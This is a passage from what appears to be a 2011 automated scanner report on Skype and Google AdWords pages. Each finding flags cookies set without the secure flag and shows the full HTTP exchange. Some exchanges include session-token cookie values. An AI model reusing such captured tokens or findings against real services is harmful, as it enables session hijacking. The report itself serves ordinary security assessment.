Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Host: login.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 20:59:15 GMT
Server: Apache
Set-Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; path=/; domain=.skype.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:15 GMT; path=/; domain=.skype.com
Location: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html


7.3. https://secure.skype.com/account/buy/package  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.skype.com
Path:   /account/buy/package

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/buy/package?product-type=package-global-region-landline-eu-unlimited HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 21:19:02 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: skype-session=l5p5g0er47bh75g44j3p4n46h7; path=/; domain=.skype.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; path=/; domain=.skype.com
Set-Cookie: return-account=https%3A%2F%2Fsecure.skype.com%2Faccount%2Fbuy%2Fpackage%3Fproduct-type%3Dpackage-global-region-landline-eu-unlimited; path=/
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:02 GMT; path=/
Location: https://secure.skype.com/account/login?product-type=package-global-region-landline-eu-unlimited&application=subscription
Vary: User-Agent,Accept-Encoding
Content-Length: 0


7.4. https://secure.skype.com/account/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.skype.com
Path:   /account/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/login?product-type=package-global-region-landline-eu-unlimited&application=subscription HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7; return-account=https%3A%2F%2Fsecure.skype.com%2Faccount%2Fbuy%2Fpackage%3Fproduct-type%3Dpackage-global-region-landline-eu-unlimited; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 21:27:09 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:27:09 GMT; path=/
Location: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Vary: User-Agent,Accept-Encoding
Content-Length: 0


7.5. https://support.skype.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.skype.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: support.skype.com

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:03:38 GMT
Set-Cookie: JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; Path=/; Secure
Set-Cookie: skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93; Path=/
Location: https://support.skype.com/en-us/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


7.6. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 10
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:28:56 GMT
Expires: Sun, 04 Sep 2011 16:28:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

7.7. https://developer.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: developer.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:21 GMT
Server: Apache
ETag: "020aa6e4eb099b150a8993581cb1b6fc"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:21 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=86660
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 8484
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE]><![endif]-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...

7.8. https://developer.skype.com/accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /accessories

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:45 GMT
Server: Apache
ETag: "8b977c5e6ee24762aaa66d3c7312af10"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:45 GMT; HttpOnly
Content-Length: 10222
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=54240
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.9. https://developer.skype.com/camera/skype-uvc-extension-unit-specification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /camera/skype-uvc-extension-unit-specification

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /camera/skype-uvc-extension-unit-specification HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:47:50 GMT
Server: Apache
Cache-Control: no-cache
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:50 GMT; HttpOnly
Location: https://developer.skype.com/camera/skype-encoding-camera-specification
Content-Length: 136
Status: 302
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=6464
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="https://developer.skype.com/camera/skype-encoding-camera-specification">redirected</a>.</body></html>

7.10. https://developer.skype.com/certification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /certification HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:49 GMT
Server: Apache
ETag: "f651d6c339947dc40adb39c0600355a0"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:49 GMT; HttpOnly
Content-Length: 7914
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=78069
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.11. https://developer.skype.com/certification/accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification/accessories

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /certification/accessories HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:51 GMT
Server: Apache
ETag: "61a7f746904d4a11ff999ed4e04fd93b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:51 GMT; HttpOnly
Content-Length: 13962
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=90680
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.12. https://developer.skype.com/certification/certified-list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification/certified-list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /certification/certified-list HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:51 GMT
Server: Apache
ETag: "574e837eaf783dc40564ec8e4561fff9"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:51 GMT; HttpOnly
Content-Length: 18790
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=155958
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.13. https://developer.skype.com/certification/odm-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification/odm-program

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /certification/odm-program HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:51 GMT
Server: Apache
ETag: "f30132140efa0328a440fddaaa36caeb"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:51 GMT; HttpOnly
Content-Length: 9848
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=26662
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.14. https://developer.skype.com/images/skype/bgHeaderDashboard.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /images/skype/bgHeaderDashboard.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/skype/bgHeaderDashboard.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:26 GMT
Server: Apache
ETag: "11a6018d86fd89857981e2233949a746"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:26 GMT; HttpOnly
Last-Modified: Thu, 10 Jun 2010 15:51:47 GMT
Status: 200
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 21:07:26 GMT
X-Web-2.0: AxD=21241
X-UA-Compatible: IE=edge,chrome=1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg; charset=utf-8
Content-Length: 41708

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ..........................................................t..
...[SNIP]...

7.15. https://developer.skype.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:44 GMT
Server: Apache
ETag: "a37c078525f0d8517aa070a52d38f169"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:44 GMT; HttpOnly
Content-Length: 7225
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=31997
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-
...[SNIP]...

7.16. https://developer.skype.com/public/skypekit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /public/skypekit

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/skypekit HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:44 GMT
Server: Apache
ETag: "29149c3b04407a170d5f4958c0b0944a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:44 GMT; HttpOnly
Content-Length: 8994
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=50733
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.17. https://developer.skype.com/public/skypekit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /public/skypekit/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/skypekit/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:45 GMT
Server: Apache
ETag: "29149c3b04407a170d5f4958c0b0944a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:45 GMT; HttpOnly
Content-Length: 8994
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=46366
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

7.18. https://developer.skype.com/resources/logoSkypeDeveloper.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /resources/logoSkypeDeveloper.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/logoSkypeDeveloper.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:24 GMT
Server: Apache
ETag: "22236befd264caee91a6404772163b9b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:24 GMT; HttpOnly
Last-Modified: Sat, 19 Jun 2010 15:01:35 GMT
Status: 200
X-Web-2.0: AxD=35983
X-UA-Compatible: IE=edge,chrome=1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif; charset=utf-8
Content-Length: 3137

GIF89a..*..........g.....=..[...........j..4...........
...........I............................%...........L..+....".......................v...........@........R.....1.....F..m.....d..O..C..|.....:
...[SNIP]...

7.19. https://developer.skype.com/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:33 GMT
Server: Apache
